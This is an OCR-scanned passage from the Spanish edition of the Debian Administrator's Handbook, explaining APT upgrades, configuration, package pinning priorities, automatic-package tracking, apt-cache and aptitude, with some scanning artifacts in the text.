Testing  o  Unstable)  utilizando  apt  install  paquete/ distribucion.  Con  esta  orden  es  posible 
volver  a  una  version  antigua  de  un  paquete  (si  sabe  que  funciona  bien,  por  ejemplo),  siempre  que 
aun  este  disponible  en  alguno  de  los  origenes  a  los  que  se  refiere  el  archivo  sou  rces .  list.  De  lo 
contrario,  el  archivo  snapshot.debian.org  puede  llegar  al  rescate  (revise  el  recuadro  «Versiones 
antiguas  de  paquetes:  snapshot  .debian .  org»  pagina  112). 
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Ejemplo  6.3  Instalacion  de  la  version  en  Unstable  de  spamassassin 


#  apt  install  spamassassin/unstable 


YENDOMAsallA  APT  mantiene  una  copia  de  cada  archivo  .deb  descargado  en  el  directorio  /var/ 
El  cache  de  archivos  deb  cache/apt/archives/.  En  caso  de  actualizaciones  frecuentes,  este  directorio  pue- 

de  ocupar  rapidamente  mucho  espacio  en  disco,  con  varias  versiones  de  cada  paque- 
te;  Deberia  ordenarlos  regularmente.  Puede  utilizar  dos  ordenes:  apt -get  clean 
vacia  completamente  el  directorio  y  apt-get  autoclean  solo  elimina  los  paquetes 
que  ya  no  pueden  ser  descargados  (porque  ya  desaparecieron  del  espejo  Debian) 
y  son  obviamente  inutiles  (el  parametro  de  configuracion  APT :  :  Clean -Installed 
puede  evitar  la  eliminacion  de  archivos  .deb  que  esten  instalados  actualmente). 
Fijese  que  apt  no  soporta  estos  comandos. 


6.2.3  Actualizacion  del  sistema 

Se  recomienda  realizar  actualizaciones  regularmente,  ya  que  incluyen  las  ultimas  actualizacio¬ 
nes  de  seguridad.  Para  actualizar,  utilice  apt  upgrade,  apt-get  upgrade  o  aptitude  safe- 
upgrade  (por  supuesto,  despues  de  apt -get  update).  Esta  orden  busca  paquetes  instalados  que 
pueden  ser  actualizados  sin  eliminar  ningun  paquete.  En  otras  palabras,  el  objetivo  es  asegurar 
la  actualizacion  menos  intrusiva  posible.  apt  -get  es  ligeramente  mas  exigente  que  aptitude  o 
apt  ya  que  se  negara  a  instalar  paquetes  que  no  estaban  instalados  previamente. 


SUCERENCIA  Como  explicamos  anteriormente,  el  objetivo  de  la  orden  ap  update  es  descargar 
Actualizacion  arch'vo  Packages  (o  Sources)  de  cada  origen  de  paquetes.  Sin  embargo,  aun 
incremental  despues  de  la  compresion  bzip2,  estos  archivos  pueden  seguir  siendo  relativamente 
grandes  (el  archivo  Packages. xz  para  la  seccion  main  de  Jessie  ocupa  mas  de  6 
MB).  Si  desea  actualizar  frecuentemente,  estas  descargas  pueden  tardar  mucho 
tiempo. 

Para  acelerar  el  proceso  APT  puede  descargar  archivos  «diff»,  que  contienen  los 
cambios  desde  la  ultima  actualizacion,  en  lugar  del  archivo  completo.  Para  lograr 
esto,  las  replicas  oficiales  de  Debian  distribuyen  diferentes  archivos  que  listan  las 
diferencias entre  unaversion  del  archivo  Packages  y  lasiguiente.  Son  generadosen 
cada  actualizacion  de  los  archivos  y  se  mantiene  un  historico  semanal.  Cada  uno  de 
estos  archivos  «diff»  solo  ocupa  unas  pocas  docenas  de  kilobytes  para  Unstable,  por 
lo  que  la  cantidad  de  datos  descargados  si  se  ejecuta  semanalmente  apt  update 
se  divide  por  10.  Para  distribuciones  como  Stable  y  Testing,  que  cambian  menos,  la 
mejora  es  menos  notable. 


116 


El  manual  del  Administrador  de  Debian 


Sin  embargo,  a  veces  puede  estar  interesado  en  descargar  el  archivo  Packages  com- 
pleto,  especialmente  cuando  la  ultima  actualization  es  muy  antigua  y  cuando  el 
mecanismo  de  diferencias  incrementales  no  ayudaria  demasiado.  Tambien  puede 
ser  interesante  cuando  el  acceso  de  red  es  muy  rapido  pero  el  procesador  en  el 
equipo  a  actualizar  es  relativamente  lento  ya  que  el  tiempo  ahorrado  en  la  descar- 
ga  es  mas  que  el  perdido  cuando  el  equipo  calcule  la  nueva  version  de  los  archivos 
(comenzando  con  las  versiones  antiguas  y  aplicando  las  diferencias  descargadas). 
Para  hacer  esto  puede  utilizar  el  parametro  de  configuracion  Acquire :  :  Pdif  f  s  y 
configurarlo  como  false. 


apt  generalmente  seleccionara  el  numero  de  version  mas  reciente  (excepto  para  paquetes  en 
Experimental  y  stable-backports,  que  son  ignorados  de  forma  predeterminada  sin  importar  su  nu¬ 
mero  de  version).  Si  especifico  Testing  o  Unstable  en  su  archivo  sources . list,  apt  upgrade 
cambiara  la  mayor  parte  de  su  sistema  en  Stable  a  Testing  o  Unstable,  lo  que  podrfa  no  ser  lo 
deseado. 

Para  indicarle  a  apt  que  utilice  una  distribution  especifica  al  buscar  paquetes  a  actualizar  de- 
be  utilizar  la  opcion  -t  o  -target-release,  seguido  del  nombre  de  la  distribution  que  desea  (por 
ejemplo:  apt  -t  stable  upg  rade).  Para  evitar  especificar  esta  opcion  cada  vez  que  utilice  apt 
puede  agregar  APT::Default-Release  ’’stable”;  al  archivo  /etc/apt/apt .  conf  .  d/local. 

Para  actualizaciones  mas  importantes,  tales  como  el  cambio  de  una  version  mayor  de  Debian  a 
la  siguiente,  necesita  utilizar  apt  full -upg  rade.  Con  esta  instruccion,  apt  completara  la  actua¬ 
lization  aun  si  tiene  que  eliminar  algunos  paquetes  obsoletos  o  instalar  nuevas  dependencias. 
Esta  tambien  es  la  orden  utilizada  por  los  usuarios  que  trabajan  diariamente  con  la  version  Uns¬ 
table  de  Debian  y  siguen  su  evolucion  dia  a  dia.  Es  tan  simple  que  casi  no  necesita  explication:  la 
reputacion  de  APT  esta  basada  en  esta  excelente  caracteristica. 

A  diferencia  de  apt  y  aptitude,  apt  -  get  no  sabe  como  hacer  full  -  upg  rade  command.  En  su  lu- 
gar  deberia  usar  apt -get  dist- upg  rade  (’’distribution  upgrade”),  la  historicay  bien  conocida 
orden  que  apt  y  aptitude  tambien  aceptanpara  satisfacer  a  los  usuarios  que  estan  acostumbra- 
dos  a  usarla. 


6.2.4.  Opciones  de  configuracion 

Ademas  de  los  elementos  de  configuracion  ya  mencionados,  es  posible  configurar  ciertos  aspec- 
tos  de  APT  agregando  directivas  en  un  archivo  del  directorio  /etc/apt/apt .  conf .  d/.  Recuerde, 
por  ejemplo,  que  APT  puede  indicarle  a  dpkg  que  ignore  errores  de  conflictos  de  archivos  espe- 
cificando  DPkg::options  { ’’—force-overwrite”;}. 

Si  solo  puede  acceder  a  la  web  a  traves  de  un  proxy,  agregue  una  linea  como  Acquire::http::pro 
xy  ”http://su-proxy:3128”.  Para  un  proxy  FTP,  utilice  Acquire::ftp::proxy  ’’ftp ://su-proxy”.  Para 
descubrir  mas  opciones  de  configuracion,  lea  la  pagina  de  manual  apt.conf(5)  con  la  orden 
man  apt .  conf  (para  detalles  sobre  las  paginas  de  manual,  revise  la  Seccion  7.1.1,  «Paginas  de 
manual»  pagina  142). 
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VOLVER  A  LOS  CIMIENTOS  Cada  vez  mas  se  utilizan  directorios  con  el  sufijo  .d.  Cada  directorio  representa 
Directorios  terminados  un  arch'vo  de  configuracion  repartido  en  multiples  archivos.  En  este  sentido,  todos 

con  d  l°s  archivos  en  /etc/apt/apt .  conf  .  d/  son  instrucciones  para  la  configuracion  de 
APT.  APT  los  incluye  en  orden  alfabetico  para  que  los  ultimos  puedan  modificar  un 
elemento  de  configuracion  definido  en  los  primeros. 

Esta  estructura  le  da  cierta  flexibilidad  al  administrador  del  equipo  y  a  los  desa- 
rrolladores  de  paquetes.  De  hecho,  el  administrador  puede  modificar  facilmente  la 
configuracion  del  software  agregando  un  archivo  prehecho  en  el  directorio  en  cues- 
tion  sin  tener  que  modificar  un  archivo  existente.  Los  desarrolladores  de  paquetes 
utilizan  el  mismo  enfoque  cuando  necesitan  adaptar  la  configuracion  de  otro  soft¬ 
ware  pare  asegurar  que  pueda  coexistir  perfectamente  con  el  suyo.  La  Normativa 
Debian  prohibe  explicitamente  modificar  los  archivos  de  configuracion  de  otros  pa¬ 
quetes  —  solo  los  usuarios  pueden  hacerlo.  Recuerde  que  durante  la  actualizacion 
de  un  paquete  el  usuario  puede  elegir  la  version  del  archivo  de  configuracion  a  man- 
tener  cuando  se  detecto  una  modificacion.  Cualquier  modificacion  externa  de  un 
archivo  dispararia  dicho  pedido,  lo  que  molestaria  al  administrador  que  esta  seguro 
de  no  haber  modificado  nada. 

Sin  un  directorio  .d  es  imposible  que  un  paquete  externo  modifique  la  configura¬ 
cion  de  un  programa  sin  modificar  su  archivo  de  configuracion.  En  su  lugar,  debe 
invitar  al  usuario  a  que  lo  haga  por  su  cuenta  y  lista  las  operaciones  a  realizar  en 
el  archivo  /usr/share/doc/pac/uete/README .  Debian. 

Dependiendo  de  la  aplicacion,  el  directorio  .d  puede  ser  utilizado  directamente  o 
administrado  por  un  script  externo  que  concatena  todos  los  archivos  para  crear 
el  archivo  de  configuracion.  Es  importante  ejecutar  este  script  luego  de  cualquier 
cambio  en  ese  directorio  para  que  se  tengan  en  cuenta  las  modificaciones  mas  re- 
cientes.  De  la  misma  forma,  es  importante  no  trabajar  directamente  en  el  archivo  de 
configuracion  creado  automaticamente  ya  que  se  perderia  todo  en  la  siguiente  eje- 
cucion  del  script.  El  metodo  seleccionado  (usar  directamente  el  directorio  .doun 
archivo  generado  desde  dicho  directorio)  esta  generalmente  definido  por  limitacio- 
nes  de  implementacion,  pero  en  ambos  casos  las  ganancias  en  cuanto  a  flexibilidad 
de  la  configuracion  mas  que  compensan  las  pequenas  complicaciones  que  signifi- 
can.  El  servidor  de  correo  Exim  4  es  un  ejemplo  del  metodo  en  el  que  se  genera 
el  archivo:  puede  configurarse  mediante  varios  archivos  (/etc/exim4/conf .  d/*) 
que  son  concatenados  en  /var/lib/exim4/conf  ig  .  autogenerated  mediante  la 
orden  update-exim4 . conf . 


6.2.5  Gestion  de  prioridades  de  los  paquetes 

Uno  de  los  aspectos  mas  importantes  en  la  configuracion  de  APT  es  la  gestion  de  las  prioridades 
asociadas  con  cada  origen  de  paquetes.  Por  ejemplo,  podria  desear  extender  una  distribucion 
con  uno  o  dos  paquetes  mas  recientes  de  Testing,  Unstable  o  Experimental.  Es  posible  asignar  una 
prioridad  a  cada  paquete  disponible  (el  mismo  paquete  puede  tener  varias  prioridades  segtin  su 
version  o  la  distribucion  que  lo  provee).  Estas  prioridades  influenciaran  el  comportamiento  de 
APT:  para  cada  paquete,  siempre  seleccionara  la  version  con  la  prioridad  mas  alta  (excepto  si 
esta  version  es  anterior  a  la  instalada  y  si  su  prioridad  es  menor  a  1000). 

APT  define  varias  prioridades  predeterminadas.  Cada  version  instalada  de  un  paquete  tiene  una 
prioridad  de  100.  Una  version  no  instalada  tiene  una  prioridad  predeterminada  de  500,  pero  pue- 
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de  saltar  a  990  si  es  parte  de  la  distribution  destino  (definida  con  la  opcion  de  linea  de  ordenes  - 
t  o  la  directiva  de  configuracion  APT::Default-Release). 

Puede  modificar  las  prioridades  agregando  elementos  en  el  archivo  /  etc/apt/p  re  fe  re  ncescon 
los  nombres  de  los  paquetes  afectados,  sus  versiones,  sus  origenes  y  sus  nuevas  prioridades. 

APT  nunca  instalara  una  version  anterior  de  un  paquete  (esto  es,  un  paquete  cuyo  numero  de 
version  sea  menor  al  que  esta  instalado  actualmente)  excepto  si  su  prioridad  es  mayor  a  1000. 
APT  siempre  instalara  el  paquete  con  la  mayor  prioridad  que  cumpla  esta  restriccion.  Si  dos 
paquetes  tienen  la  misma  prioridad,  APT  instalara  la  mas  reciente  (aquella  cuya  version  sea 
mayor).  Si  dos  paquetes  de  la  misma  version  tienen  la  misma  prioridad  pero  tienen  diferente 
contenido,  APT  instalara  la  version  que  no  esta  instalada  (se  creo  esta  regia  para  cubrir  los  casos 
de  la  actualizacion  de  un  paquete  sin  aumentar  el  numero  de  revision,  que  es  generalmente 
necesario). 

En  terminos  mas  concretos,  un  paquete  con  prioridad  menor  a  0  nunca  sera  instalado.  Un  pa¬ 
quete  con  una  prioridad  entre  0  y  100  solo  sera  instalado  si  no  hay  otra  version  ya  instalada  del 
paquete.  Con  una  prioridad  entre  100  y  500,  el  paquete  solo  sera  instalado  si  no  hay  otra  version 
mas  reciente  instalada  o  disponible  en  otra  distribucion.  Un  paquete  con  prioridad  entre  501  y 
990  sera  instalado  solo  si  no  hay  una  version  mas  nueva  instalada  o  disponible  en  la  distribucion 
de  destino.  Con  una  prioridad  entre  990  y  1000,  el  paquete  sera  instalado  a  menos  que  la  version 
instalada  sea  mayor.  Una  prioridad  mayor  a  1000  siempre  llevara  a  la  instalacion  del  paquete 
aun  si  esto  significa  que  APT  instalara  una  version  anterior. 

Cuando  APT  revisa  /et c/a pt/p references  primero  tiene  en  cuenta  las  entradas  mas  especifi- 
cas  (generalmente  aquellas  que  especifiquen  el  paquete  en  cuestion),  luego  las  mas  genericas 
(incluyendo,  por  ejemplo,  todos  los  paquetes  de  una  distribucion).  Si  existen  varias  entradas  ge¬ 
nericas,  utiliza  la  primera  coincidencia.  El  criterio  de  seleccion  disponible  incluye  el  nombre  del 
paquete  y  el  origen  que  lo  provee.  Se  identifica  cada  origen  de  paquetes  por  la  informacion  con- 
tenida  en  un  archivo  Release  y  que  APT  descarga  junto  con  los  archivos  Packages.  Especifica 
el  origen  (generalmente  «Debian»  para  paquetes  de  las  replicas  oficiales,  pero  tambien  puede 
ser  el  nombre  de  una  persona  u  organizacion  para  repositories  de  terceros).  Tambien  provee  el 
nombre  de  la  distribucion  (generalmente  Stable,  Testing,  Unstable  o  Experimental  para  las  distri- 
buciones  estandar  que  provee  Debian)  junto  con  su  version  (por  ejemplo,  8  para  Debian  Jessie). 
Revisemos  su  sintaxis  a  traves  de  casos  de  estudio  de  este  mecanismo  mas  realistas. 
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CASO  ESPECtFICO  Si  agrego  Experimental  en  su  archivo  sou  rces  .  list,  los  paquetes  correspondien- 
La  prioridad  de  tes  cas'  nunca  seran  instalados  porque  su  prioridad  APT  predeterminada  es  1.  Este 
Experimental  es’  Por  supuesto,  un  caso  especi'fico  disenado  para  evitar  que  los  usuarios  instalen 
paquetes  de  Experimental  por  error.  Los  paquetes  solo  pueden  instalarse  ejecu- 
tando  aptitude  install  paquete/experimental  —  solo  los  usuarios  que  ingre- 
sen  esta  orden  saben  los  riesgos  que  estan  tomando.  Es  posible  (aunque  no  reco- 
mendable)  tratar  los  paquetes  de  Experimental  como  aquellos  de  otra  distribution 
otorgandoles  una  prioridad  de  500.  Esto  se  logra  con  una  entrada  especifica  en 
/et  c/a  pt/ preferences: 

Package:  * 

Pin:  release  a=experimental 
Pin-Priority:  500 


Supongamos  que  solo  desea  utilizar  paquetes  de  la  version  estable  de  Debian.  Aquellos  provistos 
en  otras  versiones  no  serfan  instalados  a  menos  que  sean  pedidos  explicitamente.  Puede  escribir 
las  siguientes  entradas  en  el  archivo  /etc/apt/preferences: 

Package:  * 

Pin:  release  a=stable 
Pin-Priority:  900 

Package:  * 

Pin:  release  o=Debian 
Pin-Priority:  -10 

a=stable  define  el  nombre  de  la  distribucion  elegida.  o=Debian  limita  el  alcance  a  los  paquetes 
cuyo  origen  es  «Debian». 

Asumamos  ahora  que  tiene  un  servidor  con  varios  programas  locales  que  dependen  de  la  version 
5.14  de  Perl  y  que  desea  asegurarse  que  las  actualizaciones  no  instalaran  otra  version  del  mismo. 
Puede  utilizar  la  siguiente  entrada: 

Package:  perl 
Pin:  version  5.14* 

Pin-Priority:  1001 

La  documentacion  de  referencia  para  este  archivo  de  configuracion  esta  disponible  en  la  pagina 
de manual  a pt_p references (5)  que  puede  ver  con  man  apt_preferences. 

SUGERENCIA  No  existe  una  sintaxis  oficial  para  agregar  comentarions  en  el  archivo  /etc/apt/ 
Comentarios  en  /etc/apt/  preferences,  pero  se  pueden  proveer  algunas  descripciones  textuales  agregando 
preferences  uno  °  mas  campos  «Explanation»  al  principio  de  cada  entrada: 

Explanation:  El  paquete  xserver-xorg-video-intel  provisto 
Explanation:  en  experimental  puede  usarse  de  forma  segura 
Package :  xserver-xorg-video-intel 
Pin:  release  a=experimental 
Pin-Priority:  500 
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6.2.6.  Trabajo  con  varias  distribuciones 

Siendo  la  herramienta  maravillosa  que  apt  es,  es  tentador  elegir  paquetes  de  otras  distribu¬ 
ciones.  Por  ejemplo,  tras  instalar  un  sistema  Stable  podria  desear  probar  paquetes  de  software 
disponibles  en  Testing  o  Unstable  sin  desviarse  demasiado  del  estado  inicial  del  sistema. 

Aun  cuando  ocasionamente  encontrara  problemas  al  mezclar  paquetes  de  diferentes  distribu¬ 
ciones  apt  gestionara  muy  bien  su  coexistencia  y  limitara  los  riesgos  de  manera  muy  efectiva. 
La  mejor  manera  de  proceder  es  listar  todas  las  distribuciones  utilizadas  en  /etc/apt/sou  rces  . 
list  (algunas  personas  siempre  agregan  las  tres  distribuciones,  pero  recuerde  que  Unstable  esta 
reservado  para  usuarios  experimentados)  y  definir  su  distribucion  de  referencia  con  el  parame- 
tro  APT::Default-Release  (revise  la  Seccion  6.2.3,  «Actualizacion  del  sistema»  pagina  116). 

Supongamos  que  su  distribucion  de  referencia  es  Stable  pero  que  Testing  y  Unstable  tambien  apa- 
recenlistados  ensuarchivo  sources  .list.  Eneste  caso,  puede utilizar  apt  install  paquete/ 
testing  para  instalar  un  paquete  de  Testing.  Si  la  instalacion  falla  debido  a  alguna  dependencia 
insatisfecha,  permitale  resolver  esas  dependencias  dentro  de  Testing  agregando  el  parametro  -t 
testing.  Obviamente,  lo  mismo  aplica  a  Unstable. 

En  esta  situacion,  las  actualizaciones  (upgrade  y  full -upgrade)  se  realizan  dentro  de  Stable 
a  excepcion  de  los  paquetes  que  ya  fueron  actualizados  a  otra  distribucion:  estos  seguiran  las 
actualizaciones  disponibles  en  las  otras  distribuciones.  Explicaremos  este  comportamiento  con 
la  ayuda  de  las  prioridades  predeterminadas  de  APT  a  continuacion.  No  dude  en  utilizar  apt  -  cac 
he  policy  (revise  el  recuadro  «apt  -  cache  policy»  pagina  121)  para  verificar  las  prioridades 
otorgadas. 

Todo  gira  alrededor  del  hecho  de  que  APT  considera  solo  paquetes  con  una  version  mayor  o 
igual  que  la  instalada  (suponiendo  que  /etc/apt/preferences  no  ha  sido  usado  para  forzar 
prioridades  superiores  a  1000  para  algunos  paquetes). 


SUGERENCIA  Para  obtener  un  mejor  entendimiento  del  mecanismo  de  prioridades,  no  dude  en 
apt-cache  policy  ejecutar  apt-cache  policy  para  mostrar  la  prioridad  predeterminada  asociada 
a  cada  origen  de  paquetes.  Tambien  puede  utilizar  apt -cache  policy  paquete 
para  mostrar  las  prioridades  de  todas  las  versiones  disponibles  de  un  paquete  dado. 


Asumamos  que  instalo  la  version  1  de  un  primer  paquete  de  Stable  y  que  las  versiones  2  y  3  estan 
disponibles  en  Testing  y  Unstable  respectivamente.  La  version  instalada  tiene  una  prioridad  de 
100,  pero  la  version  disponible  en  Stable  (la  misma  version)  tiene  una  prioridad  de  990  (porque 
es  parte  de  la  version  de  destino).  Los  paquetes  en  Testing  y  Unstable  tienen  una  prioridad  de 
500  (la  prioridad  predeterminada  para  una  version  no  instalada).  El  ganador  es,  por  lo  tanto,  la 
version  1  con  una  prioridad  de  990.  El  paquete  «se  mantiene  en  Stable». 

Tomemos  como  ejemplo  otro  paquete  cuya  version  2  fue  instalada  de  Testing.  La  version  1  esta 
disponible  en  Stable  y  la  version  3  en  Unstable.  La  version  1  (de  prioridad  990  —  por  lo  tanto  menor 
a  1000)  es  descartada  porque  es  menor  que  la  version  instalada.  Esto  deja  solo  las  versiones  2  y 
3,  ambas  de  prioridad  500.  Frente  a  esta  alternativa,  APT  selecciona  la  version  mas  nueva:  la  de 
Unstable.  Si  no  desea  que  un  paquete  de  Testing  actualice  su  version  a  la  de  Unstable,  debe  asignar 
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una  prioridad  menor  a  500  (490  por  ejemplo)  a  los  paquetes  que  provengan  de  Unstable.  Puede 
modificar  /etc/apt/preferences  de  la  siguiente  forma: 


Package:  * 

Pin:  release  a=unstable 
Pin-Priority:  490 


6.2.7  Seguimiento  de  paquetes  instalados  automaticamente 


Una  de  las  funcionalidades  esenciales  de  apt  es  el  rastreo  de  aquellos  paquetes  instalados  uni- 
camente  debido  a  dependencias.  Estos  paquetes  son  llamados  «automaticos»,  y  generalmente 
incluyen  bibliotecas. 

Con  esta  informacion,  cuado  se  eliminan  paquetes,  los  gestores  de  paquetes  pueden  calcular  una 
lista  de  paquetes  automaticos  que  ya  no  son  necesarios  (porque  no  hay  paquetes  «instalados  ma- 
nualmente»  que  dependan  de  ellos).  El  comando  apt -get  auto  remove  se  encargara  de  dichos 
paquetes.  aptitude  y  apt  no  poseen  esta  orden:  el  primero  porque  los  elimina  automaticamen¬ 
te  tan  pronto  como  los  identificay,  el  ultimo  probablemente  porque  el  usuario  no  deberia  tener 
que  ejecuar  dicho  comando.  En  todo  caso,  las  herramientas  muestran  un  claro  mensaje  que  enu- 
mera  los  paquetes  afectados. 

Es  buen  habito  marcar  como  automatico  cualquier  paquete  que  no  necesite  directamente  pa¬ 
ra  que  sea  eliminado  automaticamente  cuando  ya  no  sea  necesario.  apt -mark  auto  paquete 
marcara  el  paquete  dado  como  automatico  mientras  que  apt  -ma  rk  manual  paquete  realiza  lo 
opuesto.  aptitude  ma  rkauto  y  aptitude  unma  rkauto  funcionan  de  la  misma  forma,  pero  ofre- 
cen  mas  funcionalidad  para  marcar  varios  paquetes  simultaneamente  (revise  la  Seccion  6.4.1, 
«aptitude»  pagina  125).  La  interfaz  interactiva  para  la  consola  de  aptitude  tambien  facilita  el 
revisar  la  «marca  automatica»  en  muchos  paquetes. 

Algunas  personas  podrian  desear  saber  porque  un  paquete  instalado  automaticamente  esta  pre¬ 
sente  en  el  sistema.  Para  obtener  esta  informacion  desde  la  lrnea  de  comandos  puede  utilizar 
aptitude  why  paquete  (apt  y  apt-get  no  poseen  una  funcionalidad  similar): 


$  aptitude  why  python-debian 

i  aptitude  Recommends  apt-xapian-index 

i  A  apt-xapian-index  Depends  python-debian  (>=  0.1.15) 
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ALTERNATIVA  Cuando  apt,  apt -get  y  aptitude  no  poseian  un  seguimiento  automatico  de  pa- 
deborphan  y  debfoster  quetes,  existian  dos  herramientas  que  generaban  listas  de  paquetes  innecesarios: 
deborphan  y  debfoster. 

deborphan  es  la  mas  rudimentaria  de  ambas.  Simplemente  escanea  las  secciones 
libs  y  oldlibs  (siempre  que  no  se  le  indique  otra  cosa)  buscando  los  paquetes  ins- 
talados  actualmente  de  los  que  no  depende  ningun  otro  paquete.  La  lista  resultante 
puede  servir  luego  como  una  base  para  eliminar  paquetes  innecesarios. 

debfoster  tiene  un  enfoque  mas  elaborado,  muy  similar  al  de  APT:  mantiene  una 
lista  de  paquetes  que  fueron  instalados  explicitamente  y  recuerda  que  paquetes 
son  realmente  necesarios  entre  cada  invocacion.  Si  aparecen  nuevos  paquetes  en  el 
sistema  que  debfoster  no  reconoce  como  paquetes  requeridos  seran  mostrados  en 
pantalla  junto  a  una  lista  de  sus  dependencias.  El  programa  luego  ofrece  la  opcion 
de  eliminar  el  paquete  (posiblemente  junto  a  los  que  dependen  de  el),  marcarlo 
como  requerido  explicitamente  o  ignorarlo  temporalmente. 


6.3.  La  orden  apt-cache 

La  orden  apt  -  cache  puede  mostrar  gran  parte  de  la  informacion  almacenada  en  la  base  de  datos 
interna  de  APT.  Esta  informacion  es  una  especie  de  cache,  ya  que  se  obtiene  de  las  diferentes 
fuentes  definidas  en  el  archivo  sou  rces  .  list.  Esto  ocurre  durante  la  operacion  apt  update. 


VOCABULARIO  Un  cache  es  un  sistema  de  almacenamiento  temporal  utilizado  para  acelerar  el  acce- 
Cache  so  frecuente  a  datos  cuando  el  metodo  de  acceso  usual  es  costoso  (en  cuanto  a  ren- 
dimiento).  Este  concepto  puede  aplicarse  en  numerosas  situaciones  y  en  diferentes 
escalas,  desde  el  nucleo  de  microprocesadores  hasta  sistemas  de  almacenamiento 
de  alta  gama. 

En  el  caso  de  APT,  los  archivos  de  referencia  Packages  son  los  ubicados  en  las 
replicas  de  Debian.  Teniendo  eso  en  cuenta,  seria  muy  poco  efectivo  que  cada 
busqueda  que  queramos  hacer  en  la  base  de  datos  por  paquetes  disponible  sea 
a  traves  de  la  red.  Es  por  esto  que  APT  almacena  una  copia  de  estos  archivos  (en 
/var/lib/apt/lists/)  y  las  busquedas  se  realizan  dentro  de  estos  archivos  loca¬ 
les.  De  forma  similar,  /var/cache/apt/archives/  contiene  el  cache  de  paquetes 
ya  descargados  para  evitar  descargarlos  nuevamente  si  necesita  reinstalarlos  luego 
de  eliminarlos. 


La  orden  apt  -  cache  puede  realizar  busquedas  de  paquete  basandose  en  palabras  clave  con  apt  - 
cache  search  palabra  clave.  Tambien  puede  mostrar  las  cabeceras  de  las  versiones  dispo- 
nibles  de  un  paquete  con  apt -cache  show  paquete.  Esta  orden  provee  la  descripcion  de  un 
paquete,  sus  dependencias,  el  nombre  de  su  responsable,  etc.  Note  que  apt  sea  rch,  apt  show, 
aptitude  search  y  aptitude  show funcionan  de  la  misma manera. 
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ALTERNATIVA  apt -cache  search  es  una  herramienta  muy  rudimentaria,  basicamente  implemen- 
axi-cache  *a  9reP  s°bre  la  descripcion  de  los  paquetes.  Ceneralmente  devuelve  demasiados 
resultados  o  ninguno  en  absoluto  cuando  incluye  demasiadas  palabras  clave. 

axi-cache  search  termino ,  por  el  otro  lado,  provee  mejores  resultados,  ordena- 
dos  segun  su  relevancia.  Utiliza  el  motor  de  busqueda  Xapian  y  es  parte  del  paquete 
apt-xapian-index  que  indexa  toda  la  informacion  de  los  paquetes  (y  mas,  como  los 
archivos  .desktop  de  todos  los  paquetes  Debian).  Esta  al  tanto  de  las  etiquetas 
(revise  el  recuadro  «EI  campo  Tag»  pagina  86)  y  devuelve  resultados  en  cuestion  de 
milisegundos. 

$  axi-cache  search  package  use: :searching 

105  results  found. 

Results  1-20: 

100%  packagesearch  -  GUI  for  searching  packages  and  viewing 
package  information 

98%  debtags  -  Enables  support  for  package  tags 

94%  debian-goodies  -  Small  toolbox-style  utilities 

93%  dpkg-awk  -  Gawk  script  to  parse  /var/lib/dpkg/{status , 

*+■  available}  and  Packages 

93%  goplay  -  games  (and  more)  package  browser  using  DebTags 

[.  .  .] 

87%  apt-xapian-index  -  maintenance  and  search  tools  for  a 
*+■  Xapian  index  of  Debian  packages 

[.  .  .] 

More  terms:  search  debian  searching  strigi  debtags  bsearch 
libbsearch 

More  tags:  suite: :debian  works-with :: software : package  role 
::program  interface :: commandline  implemented -in : : C++ 
**■  admin  ::  package-management  use ::  analysing 
‘axi-cache  more'  will  give  more  results 


Algunas  funcionalidades  son  menos  utilizadas.  Por  ejemplo,  apt -cache  policy  muestra  las 
prioridades  de  los  orfgenes  de  paquete  as!  como  tambien  las  prioridades  de  paquetes  individua- 
les.  Otro  ejemplo  es  apt -cache  dumpavail  que  muestra  las  cabeceras  de  todas  las  versiones 
disponibles  de  todos  los  paquetes.  apt -cache  pkgnames  muestra  una  lista  con  todos  los  paque¬ 
tes  que  aparecen  al  menos  una  vez  en  el  cache. 


6.4.  Interfaces:  aptitude,  synaptic 

APT  es  un  programa  en  C++  cuyo  codigo  esta  principalmente  en  la  biblioteca  compartida  liba  pt  - 
pkg.  Utilizar  una  biblioteca  compartida  facilita  la  creacion  de  interfaces  de  usuario  ya  que  se 
puede  reutilizar  facilmente  el  codigo  que  contiene  la  biblioteca.  Historicamente  apt -get  fue 
solo  disenado  como  una  interfaz  de  pruebas  para  libapt-pkg,  pero  su  exito  tiende  a  esconder 
este  hecho. 
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6.4.1  aptitude 


aptitude  es  un  programa  interactive  que  puede  utilizar  en  un  modo  semigrafico  en  una  consola. 
Puede  navegar  la  lista  de  paquetes  instalados  y  disponibles,  buscar  toda  la  informacion  disponi- 
ble  y  seleccionar  paquetes  a  instalar  o  eliminar.  El  programa  esta  disenado  especificamente  para 
que  lo  utilicen  administradores,  por  lo  que  sus  comportamientos  predeterminados  son  mucho 
mas  inteligentes  que  los  de  apt  -  get  y  su  interfaz  es  mucho  mas  sencilla  de  entender. 


Acciones  Deshacer  Paquete  Solucionador 
C-T:  Menu  ?:  Ayuda  q:  Salir  u:  Actualizar  g 
aptitude  0.6.11 

Buscar  Opciones  Vistas  Ayuda 
:  Descarga/Instala/Elimina  Paqs 

— \  admin  -  Utilidades  de  administracion  (instalacion  de  programas,  gestion  de 
— \  main  -  La  seccion  principal  del  archivo  (43) 

i  acpi-support-base 

0.142-6 

0.142-6 

i  acpid 

1:2.0.23-2 

1:2.0.23-2 

i  adduser 

3 . 113+nmu3 

3 . 113+nmu3 

i  A  anacron 

2.3-23 

2.3-23 

i  apt 

1.0. 3. 8. 2 

1.0. 3. 8. 2 

1.0. 3. 8. 2 

1.0. 3. 8. 2 

0.6. 11-1+b) 

L  0.6. 11-1+bl 

i  aptitude-common 

0.6.11-1 

0.6.11-1 

gestor  de  paquetes  basado  en  terminal 

aptitude  es  un  gestor  de  paquetes  con  varias  prestaciones  utiles,  incluyendo  # 
una  sintaxis  como  la  de  mutt  para  la  busqueda  de  paquetes  de  una  manera 
flexible,  una  persistencia  de  acciones  de  usuario  similar  a  dselect,  la 
capacidad  de  conseguir  y  mostrar  la  lista  de  cambios  de  la  mayoria  de  los 
paquetes  de  Debian  y  un  modo  de  linea  de  ordenes  similar  al  de  apt-get. 

aptitude  tambien  cumple  con  Y2K ,  no  engorda,  es  un  antiseptico  natural  y  esta  1 
amaestrado . 

Pagina  principal:  http://aptitude.alioth.debian.org/ 


Figura  6.1  El  gestor  de  paquetes  aptitude 


Al  iniciar,  aptitude  muestra  una  lista  de  todos  los  paquetes  ordenados  por  estado  (instalado, 
no  instalado  o  instalado  pero  no  disponible  en  las  replicas  —  otras  secciones  muestran  tareas, 
paquetes  virtuales  y  paquetes  nuevos  que  aparecieron  recientemente  en  las  replicas).  Hay  otras 
